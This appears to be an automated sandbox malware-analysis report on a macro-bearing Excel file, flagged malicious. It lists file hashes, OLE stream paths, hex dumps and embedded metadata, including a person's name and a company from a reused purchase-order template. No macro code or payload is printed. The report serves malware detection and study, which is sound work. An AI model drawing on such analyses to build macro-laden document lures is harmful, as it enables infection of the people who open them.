        Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):165
        Entropy (8bit):1.3520167401771568
        Encrypted:false
        SSDEEP:3:qs/FFyGff:qsyWf
        MD5:5C22367453CA7CD5BD7CA96C4FD55742
        SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
        SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
        SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
        Malicious:true
        Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 08:27:21 2024, Security: 1
        Entropy (8bit):7.749627073428886
        TrID:
        • Microsoft Excel sheet (30009/1) 47.99%
        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
        File name:Document.xla.xlsx
        File size:1'106'944 bytes
        MD5:d4c6ac821c22be30144711786c736a1a
        SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
        SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
        SHA512:592e25f4e3b9640eec6ad747a421f5498e4f25c74ee3bc47d06a79e4d5c30b0ca487b0518ede189ee491d10d4678a3d0dc1144912e37f798a82d594e967b68bd
        SSDEEP:12288:BumzHJEUiOIBUzMTSmD3DERnLRmF8DgEPbxpsAQx1Zj+juEPEbzYHG2VoUhvzwBF:3BazbARM8D78Z+j5WYHjVvhQccBNM
        TLSH:7E3501D5B28DAB62C606563575F3939E1710AC03D902427B37F8732D2AF76D08607FAA
        File Content Preview:........................>...................................M...................O...P...Q...R...................=...>...X.......m.......o......................................................................................................................
        Icon Hash:35e58a8c0c8a85b9
        Document Type:OLE
        Number of OLE Files:1
        Has Summary Info:
        Application Name:Microsoft Excel
        Encrypted Document:True
        Contains Word Document Stream:False
        Contains Workbook/Book Stream:True
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Code Page:1252
        Author:
        Last Saved By:
        Create Time:2006-09-16 00:00:00
        Last Saved Time:2024-12-16 08:27:21
        Creating Application:Microsoft Excel
        Security:1
        Document Code Page:1252
        Thumbnail Scaling Desired:False
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:786432
        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
        VBA File Name:Sheet1.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet1"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
        VBA File Name:Sheet2.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet2"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
        VBA File Name:ThisWorkbook.cls
        Stream Size:985
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "ThisWorkbook"
        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
        VBA File Name:Sheet1.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 10 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet1"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
        VBA File Name:Sheet2.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc c2 9e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet2"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
        VBA File Name:Sheet3.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 42 cd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet3"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
        VBA File Name:ThisWorkbook.cls
        Stream Size:985
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 2d b4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "ThisWorkbook"
        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:244
        Entropy:2.889430592781307
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:200
        Entropy:3.292068105701867
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . : ^ S O . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
        General
        Stream Path:MBD010681DB/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DB/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:37036
        Entropy:7.720975169587741
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:244
        Entropy:2.701136490257069
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
        General
        Stream Path:MBD010681DC/\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:220
        Entropy:3.372234242231489
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:MBD010681DC/MBD0018D4CE/\x1Ole
        CLSID:
        File Type:data
        Stream Size:20
        Entropy:0.5689955935892812
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . .
        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD0018D4CE/\x3ObjInfo
        CLSID:
        File Type:data
        Stream Size:4
        Entropy:0.8112781244591328
        Base64 Encoded:False
        Data ASCII:. . . .
        Data Raw:00 00 03 00
        General
        Stream Path:MBD010681DC/MBD0018D4CE/Contents
        CLSID:
        File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
        Stream Size:197671
        Entropy:6.989042939766534
        Base64 Encoded:True
        Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD0068D442/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.219515110876372
        Base64 Encoded:False
        Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD0068D442/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:26243
        Entropy:7.635433729726103
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD007203CB/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD010681DC/MBD007203CB/\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:248
        Entropy:3.0523231150355867
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:MBD010681DC/MBD007203CB/\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:256
        Entropy:4.086306928392587
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
